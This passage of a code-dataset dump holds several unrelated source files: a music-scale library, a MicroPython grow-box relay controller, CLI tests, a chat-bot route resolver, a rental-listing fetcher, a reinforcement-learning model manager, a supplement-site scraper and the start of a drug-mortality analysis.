map(note_from_key, ret)\n return bReturn(ret, rType)\n \n# TODO move Exceptions into a file 'melopy.exception'\nclass UnknownScale(Exception):\n \"\"\"\n Exception class for unknown scales\n \"\"\"\n def __init__(self, unknownScale, scaleClass) :\n \"\"\"\n Constructor.\n\n @param unknownScale: Name of unknown scale\n @type unknownScale: str\n \"\"\"\n self.err = 'Given scale \"{}\" is unknown. Known scales are:\\n{}\\n'.format(\n unknownScale, \n ' '.join(scaleClass.ScaleIntervals.keys()))\n\n def __str__(self):\n return self.err\n\n\nclass UnknownTriad(Exception):\n \"\"\"\n Exception class for unknown triads\n \"\"\"\n def __init__(self, unknownTriad) :\n \"\"\"\n Constructor.\n\n @param unknownTriad: Name of unknown scale\n @type unknownTriad: str\n \"\"\"\n self.err = 'Given triad \"{}\" is unknown. 
Known triads are:\\n{}\\n'.format(\n unknownTriad, \n ' '.join(DiatonicScale.Triad.Roots.keys()))\n\n def __str__(self):\n return self.err\n\n\n\nclass Scale(object):\n \"\"\"\n Scale will be used to obtain information about those scale... e. g.:\n \n - provide special information for different scales\n - get triad as iterable or chord (tonic, subdominant, dominant) [only in diatonic]\n - get parallel moll\n - iterate over scale (__iter__)\n \"\"\"\n\n def __init__(self, root, scaleIntervals):\n \"\"\"\n Constructor.\n\n @param root: root note of scale\n @param scaleIntervals: list contains intervals to build scale from given root note.\n \"\"\"\n #: List representation of scale\n self.scale = iterate(root, scaleIntervals, \"list\")\n #: Octave of root ==> octave of scale\n self.octave = int(self.scale[0][-1])\n\n# self.root = root\n# self.rootKey = key_from_note(root)\n# self.scaleIntervals = ScaleIntervals[scale]\n\n def __str__(self):\n return '-'.join(self.scale)\n\n def __iter__(self):\n self.scale\n\n# @property\n# def scale(self):\n# \"\"\"\n# @return: Scale over one octave\n# @rtype: list\n# \"\"\"\n# return [self.root] + [note_from_key(rootKey + interval) for interval in self.scaleIntervals]\n\n def get_note(self, noteIndex):\n \"\"\"\n Returns note at given index in scale.\n\n e.g.::\n diatonic c4 major:\n\n ... a3 b3 c4 d4 e4 f4 g4 a4 b4 c5 d5 e5 ...\n -2 -1 |0 1 2 3 4 5 6| 7 8 9\n \n\n @return: Note in Scale\n @rtype: str\n \"\"\"\n octave = self.octave + noteIndex / len(self.scale)\n \n # TODO Exception class?\n assert octave >= 0, 'This note does not exist!'\n\n # repersenting note in scale 'F#5' -> 'F#'\n # .----------------+--------------------..-+-. \n note = self.scale[noteIndex % len(self.scale)][:-1] + str(octave)\n\n return note\n\n def get_chord(self, noteIndices):\n \"\"\"\n Returns chord.\n\n e.g.::\n get chord Cmaj 1-3-5:\n c4maj.get_chord([0, 2, 4]) --> ['C4', 'E4', 'G4']\n \"\"\"\n chordRootNoteIndex = noteIndices[0]\n chordRootNote = self.get_note(chordRootNoteIndex)\n chord = [chordRootNote] + [self.get_note(chordRootNoteIndex + i) for i in noteIndices[1:]]\n\n return chord\n \n\nclass DiatonicScale(Scale):\n \"\"\"\n DiatonicScale.\n \"\"\"\n\n #: Diatonic scale types\n Minor = 'minor'\n Major = 'major'\n \n #: Scale intervals\n ScaleIntervals = {\n Major : (2,2,1,2,2,2) , \n Minor : (2,1,2,2,1,2) ,\n }\n\n class Triad(object):\n \"\"\"\n Defines Triad for this class.\n \"\"\"\n #: Diatonic triads \n Tonic = 'tonic'\n Supertonic = 'supertonic'\n Mediant = 'mediant'\n Subdominant = 'subdominant'\n Dominant = 'dominant'\n Submediant = 'submediant'\n Subtonic = 'subtonic'\n\n #: Triads root note\n Roots = {\n Tonic : 0 ,\n Supertonic : 1 ,\n Mediant : 2 ,\n Subdominant : 3 ,\n Dominant : 4 ,\n Submediant : 5 ,\n Subtonic : 6 ,\n }\n\n\n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n\n @param root: Root note.\n @param scale: Type of Diatonic scale\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n def get_triad(self, triad, rType=\"list\"):\n \"\"\"\n Getter for scales triads.\n\n @param triad: Name of triad\n @type type: str\n\n @param rType: Name of iterable type\n @type rType: str\n\n @return: Sequence of requested triad of current scale\n @rtype: depends on rType\n \"\"\"\n \n if not self.Triad.Roots.has_key(triad):\n raise UnknownTriad(triad)\n\n return self.get_chord((self.Triad.Roots[triad], 2, 4))\n\n\nclass OctatonicScale(Scale):\n \"\"\"\n 
Octatonic\n \"\"\"\n\n Half = 'half'\n Whole = 'whole'\n \n ScaleIntervals = {\n Half : (1,2,1,2,1,2,1,2) ,\n Whole : (2,1,2,1,2,1,2,1)\n }\n\n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\nclass MelodicScale(Scale):\n \"\"\"\n Melodic.\n \"\"\"\n\n Major = 'major'\n Minor = 'minor'\n \n ScaleIntervals = {\n Major : (2,2,1,2,1,2) ,\n Minor : (2,1,2,2,2,2)\n }\n \n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n\n\nclass HarmonicScale(Scale):\n \"\"\"\n Harmonic.\n \"\"\"\n\n Major = 'major'\n Minor = 'minor'\n\n ScaleIntervals = {\n Major : (2,2,1,2,1,3) ,\n Minor : (2,1,2,2,1,3)\n }\n \n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n\nclass PentatonicScale(Scale):\n \"\"\"\n Pentatonic.\n \"\"\"\n Major = 'major'\n Minor = 'minor'\n\n\n #: Dictionary, which contains intervals for previously defined scale names.\n #: Building scales by using this intervals.\n ScaleIntervals = {\n Major : (2,2,3,2) ,\n Minor : (3,2,2,3) ,\n }\n\n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n\nclass ChromaticScale(Scale):\n \"\"\"\n Chromatic.\n \"\"\"\n\n def __init__(self, root):\n \"\"\"\n Constructor.\n \"\"\"\n Scale.__init__(self, root, (1,1,1,1,1,1,1,1,1,1,1)) \n\n\n# Licensed under The MIT License (MIT)\n# See LICENSE file for more\n","sub_path":"melopy/scales.py","file_name":"scales.py","file_ext":"py","file_size_in_byte":8568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"442012287","text":"from umqtt.robust import MQTTClient\nimport dht\nimport machine\nimport utime\nimport webrepl\nimport ntptime\n\nntptime.settime()\n\nwebrepl.start()\n\nclient_id = '12345'\nmqtt_server = '192.168.2.67'\ntopic_sub = b'SMOKESHOW/relays/#'\n\nprint('\\n\\nWelcome to Operation SMOKESHOW\\nVersion Delta - 6/8/2020\\nThreat Level: Midnight\\n')\n\nclient = MQTTClient(client_id, mqtt_server)\nclient.connect()\n\nd = dht.DHT22(machine.Pin(4, machine.Pin.IN, machine.Pin.PULL_UP))\n\nled = machine.Pin(2, machine.Pin.OUT)\n\np12 = machine.Pin(12, machine.Pin.OUT) # relay 1 - fan\np5 = machine.Pin(5, machine.Pin.OUT) # relay - 4 humidifier fan\np13 = machine.Pin(13, machine.Pin.OUT) # relay 3 - led\np14 = machine.Pin(14, machine.Pin.OUT) # relay 2 - humidifier\n\npins = [p12, p5, p13, p14, led]\nfor i in pins[:]:\n i.on()\n\ndef sub_cb(topic, msg):\n print((topic, msg))\n if topic == b'SMOKESHOW/relays/light' and msg == b'on':\n p13.off() \n elif topic == b'SMOKESHOW/relays/light' and msg == b'off':\n p13.on()\n if topic == b'SMOKESHOW/relays/fan' and msg == b'on':\n p12.off()\n elif topic == b'SMOKESHOW/relays/fan' and msg == b'off':\n p12.on()\n if topic == b'SMOKESHOW/relays/humidifier' and msg == b'on':\n p14.off()\n p5.off()\n elif topic == b'SMOKESHOW/relays/humidifier' and msg == b'off':\n p14.on()\n p5.on()\n\n\ndef connect_and_subscribe():\n global client_id, mqtt_server, topic_sub\n client = MQTTClient(client_id, 
mqtt_server)\n client.set_callback(sub_cb)\n client.connect()\n client.subscribe(topic_sub)\n print('Connected to: %s \\nSubscribed to: %s' % (mqtt_server, topic_sub))\n return client\n\ndef restart_and_reconnect():\n print('Failed to connect to MQTT broker. Reconnecting...')\n time.sleep(10)\n machine.reset()\n\ntry:\n client = connect_and_subscribe()\nexcept OSError as e:\n restart_and_reconnect()\n\nwhile True:\n led.off()\n utime.sleep_ms(50)\n led.on()\n utime.sleep_ms(950) # wait 2 seconds, must be at least 750 ms for DHT22 sensor\n d.measure() # measure temp + hum\n client.publish('fruits_temp', str(d.temperature())) # publishes temp to mqtt broker\n client.publish('fruits_hum', str(d.humidity())) # publishes hum to mqtt broker\n \n # Humidifier turns on fist 4 minutes of each hour or if under 98% humidity.\n if d.humidity() < 98:\n p14.off()\n p5.off()\n elif utime.localtime()[4] < 2:\n p14.off()\n p5.off()\n elif topic == b'SMOKESHOW/relays/humidifier' and msg == b'on':\n p14.off()\n p5.off()\n else:\n p14.on()\n p5.on()\n # Fan turns on for the last 2 minutes of every hour.\n if utime.localtime()[4] > 57: \n p12.off()\n elif topic == b'SMOKESHOW/relays/fan' and msg == b'on':\n p12.off()\n else:\n p12.on()\n # LED turns on for the first 5 minutes of every hour.\n if utime.localtime()[4] < 5: \n p13.off()\n elif topic == b'SMOKESHOW/relays/light' and msg == b'on':\n p13.off()\n else:\n p13.on()\n \n # Terminal prints & debugging\n print('Operation SmokeShow')\n print('----------------------------------') \n print(machine.RTC().datetime())\n print('Humidity: ' + str(d.humidity()) + ' %')\n print('Temperature: ' + str(d.temperature()) + ' C')\n\n if p12.value() == 0:\n print('Fan ON')\n else:\n print('Fan OFF')\n if p13.value() == 0:\n print('Lights ON')\n else:\n print('Lights OFF')\n if p14.value() == 0:\n print('Humidifier ON')\n else:\n print('Humidifier OFF')\n if p5.value() == 0:\n print('Humidifier Fan ON')\n else:\n print('Humidifier Fan OFF')\n print('..................................')\n\n try:\n client.check_msg()\n except OSError as e:\n restart_and_reconnect()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"522765299","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom chaoslib.settings import CHAOSTOOLKIT_CONFIG_PATH\nimport click\nfrom click.testing import CliRunner\n\nfrom chaostoolkit.cli import cli\n\n\ndef test_source_experiment_is_mandatory():\n runner = CliRunner()\n result = runner.invoke(cli, ['run'])\n assert result.exit_code == 2\n assert result.exception\n assert 'Error: Missing argument \"source\".' in result.output\n\n\ndef test_source_path_must_exist(log_file):\n runner = CliRunner()\n result = runner.invoke(cli, [\n '--log-file', log_file.name, 'run', 'invalid.jsn'])\n assert result.exit_code == 1\n assert result.exception\n\n log_file.seek(0)\n log = log_file.read().decode('utf-8')\n assert 'Path \"invalid.jsn\" does not exist.' 
in log\n\n\ndef test_default_settings_file(log_file):\n runner = CliRunner()\n exp_path = os.path.join(\n os.path.dirname(__file__), 'fixtures', 'well-formed-experiment.json')\n result = runner.invoke(cli, [\n '--log-file', log_file.name, 'run', exp_path])\n assert result.exit_code == 1\n\n log_file.seek(0)\n log = log_file.read().decode('utf-8')\n message = \"Using settings file '{}'\".format(CHAOSTOOLKIT_CONFIG_PATH)\n assert message in log\n\n\ndef test_specify_settings_file(log_file):\n runner = CliRunner()\n settings_path = os.path.join(\n os.path.dirname(__file__), 'fixtures', 'fake_settings.yaml')\n exp_path = os.path.join(\n os.path.dirname(__file__), 'fixtures', 'well-formed-experiment.json')\n result = runner.invoke(cli, [\n '--log-file', log_file.name, '--settings', settings_path, 'run',\n exp_path])\n assert result.exit_code == 1\n\n log_file.seek(0)\n log = log_file.read().decode('utf-8')\n message = \"Using settings file '{}'\".format(settings_path)\n assert message in log\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"55783780","text":"import re\nfrom l33ty.utils.dynamicimport import import_y, from_x_import_y\nfrom l33ty.core.exceptions import ImproperlyConfigured\n\nclass RegexRoutePattern(object):\n\n def __init__(self, regex, view, kwargs=None):\n if kwargs is None:\n self.kwargs = {}\n\n self.regex = re.compile(regex)\n self.view = self._get_view(view)\n\n def _get_view(self, view):\n try:\n module = import_y(''.join(view.split('.')[:-1]))\n view_func = getattr(module, view.split('.')[-1])\n except (ImportError, AttributeError):\n raise ImproperlyConfigured('View function {0} does not exist'.format(view))\n return view_func\n\n def match(self, raw):\n results = self.regex.search(raw)\n if results is not None:\n return results.groupdict()\n else:\n return False\n\n\nclass RegexRouteResolver(object):\n\n def __init__(self, routepatterns):\n if isinstance(routepatterns, basestring):\n try:\n routeconf = import_y(routepatterns)\n except ImportError:\n raise ImproperlyConfigured('Routeconf {0} could not be imported'.format(routepatterns))\n try:\n self.patterns = getattr(routeconf, 'routepatterns')\n except AttributeError:\n raise ImproperlyConfigured('Routeconf {0} has no routepatterns attribute'.format(routepatterns))\n else:\n self.patterns = routepatterns\n\n def resolve(self, req):\n for route in self.patterns:\n if isinstance(route, RegexRouteResolver):\n out = route.resolve(req)\n if out is not None:\n return out\n\n kwargs = route.match(req.msg)\n if kwargs:\n kwargs.update(route.kwargs)\n return route.view, kwargs\n\n return None\n","sub_path":"l33ty/core/routeresolvers.py","file_name":"routeresolvers.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"145916706","text":"\n# coding: utf-8\n\n# In[1]:\nimport requests\nimport json\nfrom requests_oauthlib import OAuth1\nimport psycopg2\n\n\n# In[2]:\n\ntry:\n\timport secrets\nexcept ImportError:\n\tprint(\"could not import secrets.py\")\n\ntry:\n atlasdbconn = psycopg2.connect(\"dbname='{name}' user='{user}' host='{host}' password='{pw}'\".format(**secrets.db))\nexcept Exception:\n print(\"Unable to connect to db\")\n\n\n# In[3]:\n\natlasdbcursor = atlasdbconn.cursor()\n\n\n# In[4]:\n\nsql = \"SELECT max(downloaded) FROM 
is24rent\"\natlasdbcursor.execute(sql)\nlastlist = atlasdbcursor.fetchall()\nlast = lastlist[0][0]\n\n\n# In[5]:\n\nbaseurl = 'https://rest.immobilienscout24.de/restapi/api/search/v1.0/search/region?realestatetype=apartmentrent&geocodes=1276003&firstactivation='+last\nheaders = {\"Accept\": \"application/json\",\"charset\": \"UTF-8\"}\nauth = OAuth1(\n\tsecrets.immoscout_auth['api_key'], \n\tsecrets.immoscout_auth['api_secret'], \n\tsecrets.immoscout_auth['access_token'], \n\tsecrets.immoscout_auth['token_secret'],\n)\n\n\n# In[6]:\n\nis24 = requests.get(url=baseurl,auth=auth, headers=headers)\n\n\n# In[7]:\n\nis24parsed = json.loads(is24.content)\n\n\n# In[8]:\n\nis24parsed['page1'] = is24parsed.pop('resultlist.resultlist')\n\n\n# In[9]:\n\n# this object is identical with is24parsed. I use them to concatenate the pages\nparsed = json.loads(is24.content)\n\n\n# In[10]:\n\n#'The following lines are used to store each page\nnumberOfPages = parsed['resultlist.resultlist']['paging']['numberOfPages']\ncurrentPageNumber = parsed['resultlist.resultlist']['paging']['pageNumber']\n\n\n# In[11]:\n\nwhile currentPageNumber < numberOfPages:\n currentPageNumber = currentPageNumber +1\n url = baseurl + '&pagenumber=' + str(currentPageNumber)\n nextPage = requests.get(url=url, auth=auth, headers=headers)\n parsed = json.loads(nextPage.content)\n ''' The result is a dict with just one key ('resultlist.resultlist'). \n Using update(), values would be overwritten each time. That's I overwrite each page\n with the pagenumber '''\n parsed['page'+ str(currentPageNumber)] = parsed.pop('resultlist.resultlist')\n is24parsed.update(parsed)\n\n\n# In[12]:\n\nimport time\nzeit = time.localtime()\nyear,mon,day,hour,mi,sec = zeit[0:6]\ndownloaded = '{0:4d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}'.format(year,mon,day,hour,mi,sec)\n\n\n# In[13]:\n\nfeatures = []\nfor key in is24parsed:\n page = is24parsed[key]\n for item in page['resultlistEntries'][0]['resultlistEntry']:\n if 'wgs84Coordinate' in item['resultlist.realEstate']['address']:\n longitude = item['resultlist.realEstate']['address']['wgs84Coordinate']['longitude']\n latitude = item['resultlist.realEstate']['address']['wgs84Coordinate']['latitude']\n else:\n longitude = None\n latitude = None\n coordinates = [longitude, latitude]\n geometry = {\n \"type\": \"Point\",\n \"coordinates\": coordinates\n }\n \n # es müssten sich gemeinsamkeiten finden lassen, um das hier deutlich zu vereinfachen\n if 'preciseHouseNumber' in item['resultlist.realEstate']['address']:\n preciseHouseNumber = item['resultlist.realEstate']['address']['preciseHouseNumber']\n else:\n preciseHouseNumber = None\n \n if 'street' in item['resultlist.realEstate']['address']:\n street = item['resultlist.realEstate']['address']['street']\n else:\n street = None\n \n if 'houseNumber' in item['resultlist.realEstate']['address']:\n houseNumber = item['resultlist.realEstate']['address']['houseNumber']\n else:\n houseNumber = None\n \n \n properties = {\n 'downloaded':downloaded,\n 'published': item['@publishDate'],\n 'is24id': item['@id'],\n 'city': item['resultlist.realEstate']['address']['city'],\n 'quarter': item['resultlist.realEstate']['address']['quarter'],\n 'precisehousenumber': preciseHouseNumber,\n 'street': street,\n 'housenumber': houseNumber,\n 'postcode': item['resultlist.realEstate']['address']['postcode'],\n 'livingspace': item['resultlist.realEstate']['livingSpace'],\n 'numberofrooms': item['resultlist.realEstate']['numberOfRooms'],\n 'balcony': 
item['resultlist.realEstate']['balcony'],\n 'garden': item['resultlist.realEstate']['garden'],\n 'builtinkitchen': item['resultlist.realEstate']['builtInKitchen'],\n 'price': item['resultlist.realEstate']['price']['value'],\n 'currency': item['resultlist.realEstate']['calculatedPrice']['currency'],\n 'calculatedprice': item['resultlist.realEstate']['calculatedPrice']['value'],\n 'rentscope': item['resultlist.realEstate']['calculatedPrice']['rentScope'],\n 'priceinterval': item['resultlist.realEstate']['calculatedPrice']['priceIntervalType'],\n 'is24customerid': item['resultlist.realEstate']['companyWideCustomerId'],\n 'privateoffer': item['resultlist.realEstate']['privateOffer']\n }\n feature = {\n \"type\": \"Feature\",\n \"properties\": properties,\n \"geometry\": geometry\n }\n features.append(feature)\n\n\n# In[14]:\n\ngeojson = {\n \"type\": \"FeatureCollection\",\n \"crs\": { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\" } },\n \"features\": features\n}\n\nimport os\ncurrentpath = os.getcwd()\nwith open(currentpath+'/geojson/is24rent_after'+downloaded+'.geojson', 'w') as outfile:\n json.dump(geojson, outfile, indent=4)\n\n\n# In[15]:\n\ndef insert_point(x,y,is24id):\n sql = \"UPDATE is24rent SET geom = ST_SetSRID(ST_MakePoint(%s, %s), 4326) where is24id = %s\"\n atlasdbcursor.execute(sql,(x,y,is24id))\n\n\n# In[16]:\n\nfrom psycopg2.extensions import AsIs\n\n\n# In[17]:\n\nfor feat in features:\n props = feat['properties']\n propkeys = props.keys()\n propvalues = [props[propkey] for propkey in propkeys]\n sql = atlasdbcursor.mogrify(\"INSERT INTO is24rent (%s) VALUES %s\", (AsIs(','.join(propkeys)), tuple(propvalues)))\n atlasdbcursor.execute(sql)\n x = feat['geometry']['coordinates'][0]\n y = feat['geometry']['coordinates'][1]\n is24id = props['is24id']\n insert_point(x, y,is24id) \n\n\n# In[18]:\n\natlasdbconn.commit()\n\n\n# In[19]:\n\natlasdbcursor.close()\n\n\n# In[20]:\n\natlasdbconn.close()\n\n\n# In[ ]:\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202807762","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. 
All rights reserved.\n\nimport logging\nfrom typing import Dict, Optional\n\nimport torch\nfrom reagent.core import types as rlt\nfrom reagent.core.dataclasses import dataclass, field\nfrom reagent.core.parameters import NormalizationData, NormalizationKey, param_hash\nfrom reagent.gym.policies.policy import Policy\nfrom reagent.gym.policies.predictor_policies import create_predictor_policy_from_model\nfrom reagent.gym.policies.samplers.discrete_sampler import SoftmaxActionSampler\nfrom reagent.model_managers.model_manager import ModelManager\nfrom reagent.models.model_feature_config_provider import RawModelFeatureConfigProvider\nfrom reagent.net_builder.discrete_dqn.dueling import Dueling\nfrom reagent.net_builder.unions import (\n DiscreteDQNNetBuilder__Union,\n ValueNetBuilder__Union,\n)\nfrom reagent.training import (\n ReAgentLightningModule,\n ReinforceTrainer,\n ReinforceTrainerParameters,\n)\nfrom reagent.workflow.types import ModelFeatureConfigProvider__Union, RewardOptions\n\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass Reinforce(ModelManager):\n __hash__ = param_hash\n\n trainer_param: ReinforceTrainerParameters = field(\n default_factory=ReinforceTrainerParameters\n )\n # using DQN net here because it supports `possible_actions_mask`\n policy_net_builder: DiscreteDQNNetBuilder__Union = field(\n # pyre-ignore\n default_factory=lambda: DiscreteDQNNetBuilder__Union(Dueling=Dueling())\n )\n value_net_builder: Optional[ValueNetBuilder__Union] = None\n state_feature_config_provider: ModelFeatureConfigProvider__Union = field(\n # pyre-ignore\n default_factory=lambda: ModelFeatureConfigProvider__Union(\n raw=RawModelFeatureConfigProvider(float_feature_infos=[])\n )\n )\n sampler_temperature: float = 1.0\n\n def __post_init_post_parse__(self):\n super().__post_init_post_parse__()\n self._policy: Optional[Policy] = None\n assert (\n len(self.action_names) > 1\n ), f\"REINFORCE needs at least 2 actions. 
Got {self.action_names}.\"\n\n @property\n def action_names(self):\n return self.trainer_param.actions\n\n def build_trainer(\n self,\n normalization_data_map: Dict[str, NormalizationData],\n use_gpu: bool,\n reward_options: Optional[RewardOptions] = None,\n ) -> ReinforceTrainer:\n policy_net_builder = self.policy_net_builder.value\n policy_network = policy_net_builder.build_q_network(\n self.state_feature_config,\n normalization_data_map[NormalizationKey.STATE],\n len(self.action_names),\n )\n value_net = None\n value_net_builder = self.value_net_builder\n if value_net_builder:\n value_net_builder = value_net_builder.value\n value_net = value_net_builder.build_value_network(\n normalization_data_map[NormalizationKey.STATE]\n )\n trainer = ReinforceTrainer(\n policy=self._create_policy(policy_network),\n value_net=value_net,\n **self.trainer_param.asdict(), # pyre-ignore\n )\n return trainer\n\n def create_policy(\n self,\n trainer_module: ReAgentLightningModule,\n serving: bool = False,\n normalization_data_map: Optional[Dict[str, NormalizationData]] = None,\n ):\n assert isinstance(trainer_module, ReinforceTrainer)\n if serving:\n assert normalization_data_map is not None\n return create_predictor_policy_from_model(\n self.build_serving_module(trainer_module, normalization_data_map)\n )\n else:\n return self._create_policy(trainer_module.scorer)\n\n def _create_policy(self, policy_network):\n if self._policy is None:\n sampler = SoftmaxActionSampler(temperature=self.sampler_temperature)\n self._policy = Policy(scorer=policy_network, sampler=sampler)\n return self._policy\n\n def build_serving_module(\n self,\n trainer_module: ReAgentLightningModule,\n normalization_data_map: Dict[str, NormalizationData],\n ) -> torch.nn.Module:\n assert isinstance(trainer_module, ReinforceTrainer)\n policy_serving_module = self.policy_net_builder.value.build_serving_module(\n q_network=trainer_module.scorer,\n state_normalization_data=normalization_data_map[NormalizationKey.STATE],\n action_names=self.action_names,\n state_feature_config=self.state_feature_config,\n )\n return policy_serving_module\n\n @property\n def state_feature_config(self) -> rlt.ModelFeatureConfig:\n return self.state_feature_config_provider.value.get_model_feature_config()\n","sub_path":"reagent/model_managers/policy_gradient/reinforce.py","file_name":"reinforce.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100046523","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nimport csv\nimport re\nimport time\n\n\noption = Options()\noption.add_argument(\"--incognito\")\n\ndriver = webdriver.Chrome(options=option)\n\nurl= \"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=1\"\ndriver.get(url)\n\n#Close pop up\nwait= WebDriverWait(driver, 15)\nwait.until(EC.frame_to_be_available_and_switch_to_it((By.NAME,\"ju_iframe_607875\")))\ndriver.find_element_by_xpath(\"//*[@id='justuno_form']/div/div[2]/div\").click()\ndriver.switch_to.default_content()\n\n\n\ncsv_file = open('plantbasedprotein.csv', 'w', encoding='utf-8', newline='')\nwriter = csv.writer(csv_file)\n\nurl_list = [\"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=1\", 
\"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=2\", \"https://www.vitaminshoppe.com/c/plant-based-protein/N-cp99j6?page=3\"]\n\nwhile True:\n try:\n for url_ in url_list:\n driver.get(url_)\n\n # Open each product in new tab\n elems = [elem.get_attribute(\"href\") for elem in WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, \"//vshoppe-product-grid/div/div/div[2]/div/div[1]/div[1]/a\")))]\n windows_before = driver.current_window_handle\n\n for elem in elems:\n driver.execute_script(\"window.open('\" +elem +\"');\")\n WebDriverWait(driver, 10).until(EC.number_of_windows_to_be(2))\n\n windows_after = driver.window_handles\n new_window = [x for x in windows_after if x != windows_before][0] \n driver.switch_to.window(new_window) \n time.sleep(3)\n \n\n # Create empty dictionary to scrape product info\n product_dict={}\n\n try:\n name = driver.find_element_by_xpath('//*[@id=\"main-body-container\"]/div/div/div/div[1]/vshoppe-main-product-details-sco/div[2]/div/div/div[1]/vshoppe-product-details-upgrade/div/div/div[2]/h1').text\n except:\n name = None\n\n try:\n id_number = driver.find_element_by_xpath('//span[@class=\"item\"]').text\n except:\n id_number = None\n\n try:\n listed_price = driver.find_element_by_xpath('//span[@class=\"priceCurrencyLabel sale-price-displayed\"]/span[1]').text\n except:\n try:\n listed_price = driver.find_element_by_xpath('//span[@class=\"priceCurrencyLabel\"]/span[1]').text\n except:\n name = None\n\n try:\n price_per_serving = driver.find_element_by_xpath('//div[@class=\"pdp--priceServeRow\"]/span[1]').text\n except:\n price_per_serving = None\n\n try:\n brand = driver.find_element_by_xpath('//div[@class=\"productBrandName\"]/a[1]/span[1]').text\n except:\n brand = None \n\n try:\n ingredients = driver.find_element_by_xpath('//div[@class=\"product-label\"]/p[1]').text\n except:\n ingredients\n\n try:\n average_rating = driver.find_element_by_xpath(\"//span[@id='TTreviewSummaryAverageRating']\").text\n except:\n average_rating = None\n\n try: \n review_count = driver.find_element_by_xpath(\"//div[@class='TTreviewCount']\").text\n except:\n review_count = None\n\n try:\n recommend_yes = driver.find_element_by_xpath('//div[@class=\"TTreviewDimsSingleSelectSummary\"]/div[@class=\"TTreviewDimsSingleSelectValue\"][1]').text\n except:\n recommend_yes = None\n\n try:\n recommend_no = driver.find_element_by_xpath('//div[@class=\"TTreviewDimsSingleSelectSummary\"]/div[@class=\"TTreviewDimsSingleSelectValue\"][2]').text\n except:\n recommend_no = None\n\n try:\n speciality_diet = driver.find_element_by_xpath('//*[@id=\"link1\"]/div/div/div[1]/div[10]/div[2]/div[2]/p[1]').text\n except:\n speciality_diet = None\n\n try: \n form = driver.find_element_by_xpath('//*[@id=\"link1\"]/div/div/div[1]/div[2]/div[2]').text\n except: \n form = None\n\n try:\n calories = driver.find_element_by_xpath(\"//*[@id='link1']/div/div/div[2]/div[2]/table/tbody/tr[1]/td[2]/span\").text\n except:\n calories = None\n\n\n \n product_dict['name'] = name\n product_dict['id_number'] = id_number\n product_dict['listed_price'] = listed_price\n product_dict['price_per_serving'] = price_per_serving\n product_dict['brand'] = brand\n product_dict['ingredients'] = ingredients\n product_dict['average_rating'] = average_rating\n product_dict['review_count'] = review_count\n product_dict['recommend_yes'] = recommend_yes\n product_dict['recommend_no'] = recommend_no\n product_dict['speciality_diet'] = speciality_diet\n product_dict['form'] = form\n 
product_dict['calories'] = calories\n\n writer.writerow(product_dict.values())\n\n # Close the window\n driver.close()\n driver.switch_to.window(windows_before)\n\n except:\n try: \n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n except: \n csv_file.close()\n driver.close()\n break","sub_path":"vitaminshoppe/plantbased.py","file_name":"plantbased.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"107324093","text":"from sklearn import linear_model\nimport pandas as pd\nimport numpy as np\nimport glob\nfrom plotnine import *\nimport os\n\nos.chdir(\"/Users/N1/Op690/estimating-impact-of-opioid-prescription-regulations-team-3/00_source/\")\n\npolicy_change_year = 2012\nsearch = \"WA\"\n\n# combine data in all files\nappended_data = pd.DataFrame()\nfor filename in glob.glob('US_VitalStatistics/*.txt'):\n df_tmp = pd.read_csv(filename, sep='\\t')\n appended_data = appended_data.append(df_tmp)\n\nappended_data.head()\n\n\n# Save all mortality dataset to one file\n# FL_data.to_csv('US_Mortality_2003_2015.csv')\n\nsearch2 = \"Drug poisonings\"\nx = appended_data['County'].str.endswith(search, na=False)\nState_data = appended_data[x]\nY = State_data[\"Drug/Alcohol Induced Cause\"].str.startswith(search2, na=False)\nState_data = 